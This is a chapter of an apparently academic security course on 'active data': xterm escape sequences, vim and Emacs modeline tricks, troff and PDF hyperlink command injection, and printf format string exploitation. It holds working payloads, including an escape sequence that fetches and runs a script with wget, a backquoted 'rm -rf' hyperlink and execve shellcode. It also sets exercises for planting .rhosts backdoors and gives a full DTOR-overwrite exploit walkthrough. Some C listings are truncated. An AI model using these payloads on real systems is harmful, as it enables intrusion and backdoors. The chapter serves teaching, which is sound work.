Next Previous Contents

5. Active data

One is inclined to think about data processing as having programs, the active parts, and data, the passive parts. Then it comes as a surprise that one can be attacked by data.

5.1 Nostalgia

The first time I created active data was in 1974 on a PDP-8 under OS/8. The command GET should read a binary tape or file, but not execute it. The command RUN would execute it. However, a suitably crafted papertape would take over control of the machine when read using the GET command. This was done taking advantage of an off-by-one error in the loader.

5.2 Terminals and terminal emulators

Text sent to a terminal is displayed there. Most terminals recognize command sequences embedded in the text. Common sequences indicate bold, or blinking, or underline, or half bright. More recently also color. Other sequences ask for erase line, scroll up etc. etc. On the VT100 such special sequences mostly start with the ESC symbol, and hence they are known as "escape sequences".

But the traffic is bidirectional - one can ask a terminal for its model number or serial number, for a status, for the position of the cursor, for the contents of the current line, for the screen contents.

That is interesting. Send someone a letter with some embedded sequences. If she views it on her terminal, the sequences may activate terminal functions. Text sent back by the terminal itself is indistinguishable from commands typed by the user.

For example, on vt100 terminals the character 0232 or the combination ESC Z sends back the terminal ID, 1;2c on my xterm.

Programs like xterm often have powerful features. Old versions of xterm accept escape sequences that specify a log file, and ask to start logging to that file. But that means that anybody who manages to get his text printed on such a terminal can destroy a file of his choice - maybe even give it a chosen content. Current versions have this feature switched off by default. But so many features remain.

People usually set mesg n to inhibit writes to their terminal. Programs like write and talk must filter out escape sequences.

There used to be all kinds of fun with terminals. For example, stty speed 0 < /dev/ttyN would set the baud rate of a given terminal to zero and log the user off.

Even when there is no security breach, funny sequences can cause a loss of time. One can iconify the window, change its size, lock (part of) it, change character set, make foreground and background colors equal, and do lots of other annoying things, so that it may take a non-expert a considerable amount of time to get back to normal. There may also be privacy concerns. On an xterm, the 3-symbol sequence ESC [ i sends the screen to the printer.

Exercise Play with xterm. What do the sequences ESC [ 2 t and ESC [ 3 ; 100 ; 0 t and ESC [ 4 ; 1 ; 1 t and ESC [ 2 1 t and ESC ] 2 ; h a c k e d BEL do? (Test by typing to cat or ed or so, or use echo, for example echo -e "\e]2;hacked\a".)

As a combination of the last two parts of this exercise, look at

echo -e "\e]2;;wget;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"
The command to fetch a file with commands from some place on the net and execute it is stored in the window title bar. Then the window title bar is reported, and executed as soon as the user hits enter.

Exercise ( H D Moore) What does echo -e "\eP0;0|0A/17\x9c" do?

Exercise Construct a filename so that echoing its name to an xterm window colours the background red.

Exercise Construct a filename so that echoing its name to an xterm window removes the line containing that name. A good name to use if one knows that the name of a program will be echoed in an error message to the console screen.

Exercise Design a short text file called README so that after the command cat README the xterm window does not show anything suspicious, but after the next command the machine is hacked (let us say, a file .rhosts is created that allows access to anyone).

5.3 Editors


The Unix editor ex (with "visual" variant vi) would accept the sequences ex:, ei:, vx: and vi: occurring in the first or last five lines of the file being edited, and interpret the rest of the line as a startup command. (Still in 4.2 BSD.) Later this behaviour was made conditional upon a variable modeline or modelines. This is still the situation on many systems that have some vi-clone.

One could do funny things, like setting the shell and tags programs to be used, so that the system would be compromised as soon as a shell escape was used. On other systems it was even easier, and commands could be invoked directly from the modeline via a shell escape. ( Here a discussion from 2001.)

Recent systems either disable modelines, or enable them but disallow the most dangerous uses. Nevertheless similar bugs keep coming up - allowing embedded scripts in files is inherently unsafe.

Georgi Guninski gave the example (Dec 2002)

/* vim:set foldmethod=expr: */
/* vim:set 
foldexpr=confirm(libcall("/lib/","system","/bin/ls"),"ms_sux"): */

vim better than windoze
that later was upgraded to a worm. On my system the version
vim: foldmethod=expr
vim: foldexpr=libcall("/lib/","system","/bin/ls\ -l")

vim better than windoze
works better (and shows how to use commands with parameters).

Exercise Find whether this works in your vi, possibly after changing the settings for modeline or modelines. Construct a letter such that if the vi-using receiver replies to it a backdoor is left on his system.

In Dec 2004 the following was discovered:

% cat .vimrc
set modeline
filetype plugin on
% cat evil.vim
let a = system('echo "I was here" > /tmp/owned')
% cat test
vim: ft=../../../../../home/aeb/evil
% cat /tmp/owned
cat: /tmp/owned: No such file or directory
% vim test
% cat /tmp/owned
I was here

Clearly, any cautious user has set nomodeline in his .vimrc.

Note that in many contexts people have tried to restrict the use of files to "local" ones, forbidding absolute pathnames. Often such a restriction can be circumvented using ../.


In a completely similar way, many files contain embedded strings intended to set emacs options. For example, many man page source files start out

.\" Hey Emacs! This file is -*- nroff -*- source.
Here the part between -*-'s defines the major mode, and can also contain variable settings. There can also be a Local Variables: part at the end of a file. For example, in the Linux kernel many files in the SCSI code part end with
 * Overrides for Emacs so that we follow Linus's tabbing style.
 * Emacs will notice this stuff at the end of the file and automatically
 * adjust the settings for this buffer only.  This must remain at the end
 * of the file.
 * ---------------------------------------------------------------------------
 * Local variables:
 * c-indent-level: 4
 * c-brace-imaginary-offset: 0
 * c-brace-offset: -4
 * c-argdecl-indent: 4
 * c-label-offset: -4
 * c-continued-statement-offset: 4
 * c-continued-brace-offset: 0
 * indent-tabs-mode: nil
 * tab-width: 8
 * End:
This feature can (and should!) be disabled, but enable-local-variables is often t by default. Set it to nil. Sometimes one has to use inhibit-local-variables. Set it to t. Sometimes there is an additional variable enable-local-eval that enables the more dangerous actions in a Local variables section.

Charles Howes gave the example

So there you are, reading along in some file that you found.
Just browsing away, when what happens, but some magic bit of
Local variables:
find-file-hooks: ((lambda ()
                           (goto-char 0)
                           (re-search-forward "^Local variables:$")
                           (let ((p (point)))
                             (re-search-forward "^End:$")
                             (let ((m (buffer-modified-p)))
                               (delete-region p (1+ (point)))
                               (setq p (point))
                               (insert "-- hi there, I'm toast. -- ")
                               (insert (or (buffer-file-name) "nil"))
                               (call-process-region p (point)
                                 "/bin/echo" t 0 nil
                                 "you" "are" "toast")
                               (set-buffer-modified-p m)
                      (kill-local-variable 'find-file-hooks))))
text buried in that buffer comes to life and runs an arbitrary
piece of code at you.

Have a nice day! 

(This works here. The known attacks in this style were fixed in emacs 21.3.)

Exercise Find whether this works in your emacs, possibly after changing the settings for enable-local-eval, enable-local-variables, inhibit-local-variables.

Windows macro viruses

Very similar things hold for the Microsoft world, where macro viruses have been seen since 1995. An MS Word or Excel document can have a macro section with Word.Basic commands. Arbitrary actions can be caused by just opening the document. Some ancient links: an early advisory, an early FAQ, Virus Encyclopedia, Macro Virus writing Tutorial Part 1, Part 2.

5.4 Formatters

Formatters use a formatting language. Sometimes this language allows one to invoke arbitrary commands.


Runoff was a text formatter. Unix had the typesetter version troff and the non-typesetter version nroff. GNU has groff. These days TeX has taken over (mostly because troff is proprietary I suppose - for myself I prefer troff), but troff is still widely used as man page formatter. Various versions have commands that will invoke arbitrary system programs (e.g. .sy cmd or .pso cmd). Thus, it may be dangerous to view man pages obtained from an unreliable source. On my current Linux system I see

% cat foo.1
.sy date
.pso ls
% man ./foo.1
<standard input>:2: .sy request not allowed in safer mode
<standard input>:3: .pso request not allowed in safer mode
% troff -U foo.1
Tue Apr 1 11:00:05 CEST 2003
x T ps
x res 72000 1 1
x init
That is, one has to ask for "unsafer" mode for these macros to take effect.

PostScript and PDF

A similar story. Postscript "pictures" are really programs. In case such programs can execute arbitrary system commands, it is dangerous to look at Postscript files from untrusted sources. If your browser can display Postscript, then you lose as soon as you click on a link to a page that contains an evil picture.

And even if the viewer tries to restrict dangerous commands, it can be hit by a buffer overflow or syntax error. There is a long list of advisories concerning the handling of PostScript and PDF, the latest one today.

One can also insert bad strings into a PDF file, that cause a viewer like xpdf to emit an error message containing that bad string. If the viewer was invoked on an xterm then tricks discussed above apply: one can hit xterm with arbitrary escape sequences.

PDF files can also contain suitably constructed hyperlinks that can cause arbitrary code to be run when activated by the reader.

xpdf and hyperlinks

Let us look at some detail. First, what precisely does xpdf (my PDF viewer) do when one clicks a hyperlink? Maybe it calls a browser - the details depend on user settings. Some config file, like /etc/xpdfrc or .xpdfrc, can contain a line like

urlCommand     "netscape -remote 'openURL(%s)'"
telling what to do with this hyperlink. If there is no such line we get a message URI: ... on the xterm where we invoked xpdf.

Exercise Construct a PDF file with a hyperlink such that clicking that link (when urlCommand is not set) will set the xterm title bar to "-hacked-" and move the xterm window to some other place on the screen.

But things are more interesting when there is a urlCommand. It will be invoked as system(CMD &), that is, as sh -c 'CMD &'. (More precisely, single and double quotes in CMD will be replaced by %27 and %22, otherwise CMD is copied faithfully. The latest RedHat security fix also replaces back quotes by %60.) A urlCommand like the default one shown above (with the %s part enclosed in single quotes) is fairly safe. But many distributions have an unprotected %s. For example, RedHat 8.0 uses

urlCommand      "/usr/bin/xpdf-handle-url %s"

Make a LaTeX file with a hyperlink:

\href{prot:hyperlink with stuff, say, `rm -rf /tmp/abc`; touch /tmp/pqr}{\texttt{Click me}}
and invoke pdflatex to make a PDF file. Now look at it with xpdf, and click the link. The file /tmp/abc is removed and /tmp/pqr is created. (If there is a popup window telling that /usr/bin/xpdf-handle-url should be edited to teach it about the protocol prot:, hit enter in that window.) One can follow what happens using strace -f -e execve xpdf test.pdf or so. The sh -c '/usr/bin/xpdf-handle-url prot:hyperlink with stuff, say, `rm -rf /tmp/abc`; touch /tmp/pqr' invokes rm via the backquote construction, and touch since ; is a command separator.

We see that a security fix that removes backquotes does not suffice. The right fix is to write

urlCommand      "/usr/bin/xpdf-handle-url '%s'"
and to have a xpdf-handle-url that never exposes its $1 like the RedHat 8.0 version does in another sh -c.

Conclusion of this discussion: one can easily produce PDF files such that when these are viewed by xpdf on a current machine arbitrary commands are executed (with the permissions of the reader). I have not tried Acroread, but one says that the same things hold there.

Exercise Construct a PDF file with a hyperlink such that clicking that link on a RedHat 8.0 system will create a .rhosts file with appropriate contents in the reader's home directory.

5.5 printf - format string exploits

More a method than an example comes with the routine printf(). The ordinary use is for formatted printing, as in printf("val=%d\n",val) or printf("Hello, world!\n"). The argument string is printed, except that some combinations involving % have a special meaning.

The example printf("Hello, world!\n") inspires people to write printf(s) where s is some string. But that has interesting effects when the user can influence the string that is printed, making sure that it contains active data.

Let us write the program echo.c.

#include <stdio.h>

int main(int argc, char **argv) {
        int i;

        for (i = 1; i < argc; i++) {
                if (i > 1)
                        printf(" ");
        return 0;

Seems straightforward, and it works. Or, does it?

% ./echo Goodbye SCO!
Goodbye SCO!
% ./echo Ach %d %s
Ach -1073744428 h÷¿o÷¿s÷¿v÷¿
% ./echo "%08x %08x %08x %08x %08x"
bffff5d4 bffff588 4015afd8 40018420 00000001
% ./echo "%s %s %s %s %s"
Segmentation fault

If the string contains a percent-something combination then the required argument is fetched from the stack, and we print garbage or crash. We understand the crash: the address 00000001 is used to print a string from, but there is nothing there. Let us try to understand the garbage.

When printf() prints the string, the stack has the local variables of printf(), the saved frame pointer, the return address, and the parameters of printf() - in this case the format string. Try to get at the format string by using a longer format string. Typing lots of %08x gets boring. Use perl to do that for us.

(For perl, . is concatenation, and x repeats the preceding string the indicated number of times. For example, "%08x %08x %08x %08x " can be written as "%08x "x4.)

% FMT=`perl -e 'print ((("%08x "x8)."\n")x6)'`; ./echo "$FMT"
bffff4f4 bffff4a8 4015afd8 40018420 00000001 bffff4c8 40040d17 00000002 
bffff4f4 bffff500 40018ba0 00000002 08048280 00000000 080482a1 0804833c 
00000002 bffff4f4 080483b0 08048410 4000d930 bffff4ec 00000000 00000002 
bffff67c bffff683 00000000 bffff779 bffff792 bffff7e7 bffff7f7 bffff829 
bffff838 bffff85f bffff86a bffff875 bffff885 bffff896 bffff8a4 bffff8c0 
bffff8d2 bffff8e5 bffff900 bffff909 bffffbca bffffbe3 bffffc03 bffffc11 
The stack grows downward from 0xc0000000 and hence pointers to the stack tend to look like 0xbfff..... All those pointers to the stack at the end of the above list are environment pointers:
% FMT=`perl -e 'print (((("%08x "x8)."\n")x3).("%08x "x3)."%s\n"x2)'`; ./echo "$FMT"
bffff554 bffff508 4015afd8 40018420 00000001 bffff528 40040d17 00000002 
bffff554 bffff560 40018ba0 00000002 08048280 00000000 080482a1 0804833c 
00000002 bffff554 080483b0 08048410 4000d930 bffff54c 00000000 00000002 
bffff6e2 bffff6e9 00000000 LESSKEY=/etc/lesskey.bin
Below the environment pointers we see argc (2) and the list of (the two) arguments of the ./echo "$FMT" invocation, terminated by NULL.
% FMT=`perl -e 'print (((("%08x "x8)."\n")x3)."%s\n"x2)'`; ./echo "$FMT"
bffff564 bffff518 4015afd8 40018420 00000001 bffff538 40040d17 00000002 
bffff564 bffff570 40018ba0 00000002 08048280 00000000 080482a1 0804833c 
00000002 bffff564 080483b0 08048410 4000d930 bffff55c 00000000 00000002 
%08x %08x %08x %08x %08x %08x %08x %08x 
%08x %08x %08x %08x %08x %08x %08x %08x 
%08x %08x %08x %08x %08x %08x %08x %08x 
Yes, precisely as expected. We can find the format string on the stack, with the closing NUL byte at address 0xbffff778 and a starting address that depends on its length. (Above the starting address was bffff6e9 with a string of length 143.)

The program itself lives around 08048000:

% nm ./echo | grep -w main
0804833c T main
so numbers like 08048280, 080482a1, 0804833c, 080483b0, 08048410 are probably program addresses.

Write to memory

Can such a printf format flaw be exploited?

Read the printf(3) manual page. We encounter %n:

    n      The number of characters written so far is stored into the
           integer indicated by the int * pointer argument.
Interesting. One can write to a given address. The value written to that address is the number of bytes printed so far. We have easy control over that. Can put lots of padding in the format string, or, easier, use formats like %73x to print numbers with any predetermined amount of padding. So, any (not too large) number above some lower bound can be written via %n. Remains to get control over the address written to.

First read a bit more in printf(3). It says

     By default, the arguments are used in the order given, where
     each `*' and each conversion specifier asks for the next argument.
     One can  also  specify  explicitly which argument is taken,
     by writing `%m$' instead of `%' and `*m$' instead of `*', where
     the decimal integer m denotes the position in the argument list.
(There is more text there, and we'll violate the rules, but it works.)

That simplifies matters. We can use this in the format to jump immediately to the desired place. As a test, let us find program name and format again on the stack.

% ./echo '%25$s %26$s'
./echo %25$s %26$s
As expected. Now overwrite the program name with an exclamation mark.

% ./echo '%25$33s%25$n %25$s'
                           ./echo !
Look what happened. First we print the program name padded with spaces, in a field of width 33. Then write the number of symbols written so far (that is, 33, the ASCII code for !) to the place where the program name was found earlier. Four bytes are written, in little-endian order, 0x33, 0, 0, 0, and the first two of these form the string "!" that is printed now.

So it works. We can overwrite memory with a given value. But the address written to was found only because there happened to be a pointer to it on the stack. In order to write to arbitrary addresses we must have arbitrary pointers on the stack, and can create them since the format string is found on the stack.

Where is this format string? Dump a larger fraction of the stack.

% FMT=`perl -e 'print ((("%08x "x8)."\n")x16)'`; ./echo "$FMT"
bffff354 bffff308 4015afd8 40018420 00000001 bffff328 40040d17 00000002 
bffff354 bffff360 40018ba0 00000002 08048280 00000000 080482a1 0804833c 
00000002 bffff354 080483b0 08048410 4000d930 bffff34c 00000000 00000002 
bffff4e2 bffff4e9 00000000 bffff779 bffff792 bffff7e7 bffff7f7 bffff829 
bffff838 bffff85f bffff86a bffff875 bffff885 bffff896 bffff8a4 bffff8c0 
bffff8d2 bffff8e5 bffff900 bffff909 bffffbca bffffbe3 bffffc03 bffffc11 
bffffc1c bffffc2a bffffc3e bffffc51 bffffcff bffffd08 bffffd2a bffffd3f 
bffffd53 bffffd6f bffffd7a bffffde8 bffffdf0 bffffdff bffffe1d bffffe2a 
bffffe49 bffffe5c bffffe81 bffffea2 bffffead bffffec6 bffffed2 bffffede 
bfffff07 bfffff1f bfffff45 bfffff78 bfffff85 bfffffa2 bfffffb7 bfffffcf 
bfffffdb bfffffec 00000000 00000020 ffffe400 00000021 ffffe000 00000010 
0183f9ff 00000006 00001000 00000011 00000064 00000003 08048034 00000004 
00000020 00000005 00000006 00000007 40000000 00000008 00000000 00000009 
08048280 0000000b 000001f4 0000000c 000001f4 0000000d 00000064 0000000e 
00000064 00000017 00000000 0000000f bffff4dd 00000000 00000000 00000000 
00000000 00000000 38366900 2f2e0036 6f686365 38302500 30252078 25207838 
Yes. The format repeats the bytes %08x , that is, 0x25, 0x30, 0x38, 0x78, 0x20, starting from 0xbffff4e9, closing NUL at 0xbffff778. Here argument 126 is 0x38302500, that is, the closing NUL of the program name, and the first three bytes of the format. And argument 127 is 0x30252078, the next four bytes of the format.

Life is simpler when the format string starts at an address divisible by 4, so in this example we must give it a length that is 0 (mod 4). (Note that the sh backquote construction trims trailing newlines, so that the format in this last example has length 655.)

For example,

% ./echo 'AAAABB %124$08x %125$08x'
AAAABB 41414141 25204242
Here the string has length 24, divisible by 4, and 124 words from top-of-stack the AAAA is seen. This number 124 varies a little with the length of the format string (mod 16) due to alignment effects. Let us only work with formats of a length divisible by 16, then the format starts at word 126:

./echo 'ABCDXXX %126$08x'
ABCDXXX 44434241

Try to overwrite the program name with "Hoi!". That is, we want bytes 0x48, 0x6f, 0x69, 0x21, 0 (decimal 72, 111, 105, 33, 0) at some address like 0xbffff4e2. Using %n we can write four bytes, but the value written is the number of bytes output so far, and 0x21696f48 is too large, so it must be written one byte at a time. Do four writes, to increasing addresses. Each write creates the byte we want but overwrites the next three bytes with NULs.

If we make a format string of length 64, then it will start at 0xbffff738, and the program name will start at 0xbffff731.

% FMT=`perl -e 'print "\x31\xf7\xff\xbf\x32\xf7\xff\xbf\x33\xf7\xff\xbf\x34\xf7\xff\xbf%56d%126\x24n%39d%127\x24n%250d%128\x24n%184d%129\x24n\x0a%25\x24s"'`
% ./echo "$FMT"
1÷¿2÷¿3÷¿4÷¿                                             -1073744476                            -1073744552                                                                                                                                                                                                                                                1075163096                                                                                                                                                                              1073841184
Explanation: the part \x31\xf7\xff\xbf stores 4 bytes that together form the address 0xbffff731. Then \x32\xf7\xff\xbf forms 0xbffff732. Etc. Four addresses start the format string, ready to be accessed via %126$n, %127$n, etc. Here the dollar sign is coded as \x24 to prevent expansion as shell variable. In order to write the desired values via these %n pointers, we have to print some bytes. That is the purpose of the %56d etc. parts of the format. Finally, the %25$s prints the program name, verifying that we succeeded in writing "Hoi!" there. The \x0a is a newline, making sure that "Hoi!" appears on a new line after the garbage line.

This means that we have complete control over the program. We can make it exec a shell and get remote access if this was a remote program, or get root access if this was a setuid root program.


Very small field widths will fail: printing 666 with format %2d takes 3 positions, not 2. The worst case with a decimal signed format may be -2147483648 which takes 11 positions. So, one should use %258d instead of %2d (etc.) so as to avoid this problem. Or one can use %2c instead, where that is supported.


For an exploit it suffices to overwrite a single memory location with a single value. The memory location will be one that holds a return address, or the address of a function that is going to be called. The single value will be the address of a function that we would like to call instead.

A concrete setup can be the following:

1. Put shellcode in the environment:

% SHELLCODE=`perl -e 'print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
% export SHELLCODE
(This modifies the environment, and changes all addresses found above, so should have been done at the start.)

1a. Find the address of the shellcode. Maybe with a tiny program like

#include <stdio.h>
#include <stdlib.h>

int main(int ac, char **av) {
        while (--ac > 0) {
                char *p = getenv(*++av);
                printf("%p\n", p);
        return 0;
Give this tiny program a name of the same length as that of the program we want to exploit (increasing the length of the program name by 1 decreases the address of environment variables by 2), and ask for the address:
% ./addr SHELLCODE

2. Find the address of the destructor table of the program.

% nm ./echo | grep DTOR
08049580 d __DTOR_END__
0804957c d __DTOR_LIST__

Now write the address of the shellcode, that is, 0xbffff837 to the address 0x08049580. When the program exits, its destructors will be called and our shellcode is executed.

Cleaned environment

Some security-conscious programs remove all environment variables except perhaps for a few known ones. If one cannot store a string in the environment, the string can be one of the program parameters. If the program does not allow that, one can create a link to the program so that the exploit string becomes the name of the program.

Exploit examples

Maybe the first exploit of this type was the wu-ftpd exploit (published June 2000, one of the exploits given there is dated 15-10-1999). Study the code!

When people started looking for such vulnerabilities, these were found all over the place. An xlock exploit. An rpc.statd exploit. An LPRng exploit. These were root exploits. Here a PHP exploit that gives one the rights of the invoker, probably httpd.


Many variations on this theme are discussed on the web. A good reference to these exploits is this 2001 writeup. See also the notes by Frédéric Raynal and Kalou.

Next Previous Contents